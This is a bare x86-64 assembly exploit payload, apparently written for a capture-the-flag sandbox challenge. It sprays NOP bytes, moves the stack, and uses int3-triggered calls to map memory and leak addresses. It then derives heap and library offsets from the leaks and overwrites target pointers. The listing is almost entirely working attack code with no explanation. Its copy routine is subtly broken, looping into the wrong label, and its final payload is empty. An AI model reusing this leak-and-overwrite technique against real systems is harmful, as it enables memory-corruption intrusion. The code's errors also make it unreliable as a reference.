mov rdi, 0x42420000
mov edx, 1
mov ecx, 0x10
l:
mov rax, 0x9090909090909090
mov qword ptr [rdi+8*rdx], rax
inc edx
loop l

lea rsi, [rip+evil]
mov edx, 6
mov rsp, 0x13380f00
call memcpy

mov eax,10
mov rbx, 0xdead000
mov rcx, 0x10000
mov rdx, leaked_address
int3

mov r10, 0xdead000
mov r8, qword ptr [r10+0x10]
lea r9, [r8-0x1a0]

mov rbx, r9
mov eax,2
int3

mov r11, qword ptr [r10+0x60]
sub r11, 0x41f0
mov rbx, r11
mov eax,2
int3
//heap


mov eax,10
mov rbx,0xdeadbeef000
mov rcx, 0xf000
mov rdx, r9
int3

mov rdi, 0xdeadbeef000
lea rsi, [rip+final]
mov rdx, 0x80
call qmemcpy

push r11
mov eax,10
mov rbx,0xdeaddead000
mov rcx, 0xb0000
mov rdx, r11
int3
pop r11

mov r11,0xdeaddead000
mov r12, qword ptr [r11+0x5b00]
sub r12,0x1630

mov rbx, r12
mov eax,2
int3


mov eax,10
mov rbx, 0x12345000
mov rcx, 0xf000
mov rdx, r12
int3


mov rbx, r9
mov eax,2
int3

mov r12, 0x12345000
mov qword ptr [r12+0xd38], r9
mov qword ptr [r11+0x3fc90], -1
jmp $

memprot_x86_64:
.asciz "memprot_x86_64"
password_buffer:
.asciz "sup3r_s3cure_sj\\0"
password:
.asciz "password"

memcpy:
test rdx, rdx
jz memcpy_done
memcpy_loop:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
dec rdx
jnz memcpy_loop
memcpy_done:
ret

qmemcpy:
test rdx, rdx
jz memcpy_done
qmemcpy_loop:
mov rax, [rsi]
mov [rdi], rax
add rsi,8
add rdi,8
sub rdx,8
jnz memcpy_loop
qmemcpy_done:
ret

evil:
mov eax, 5
int3

final: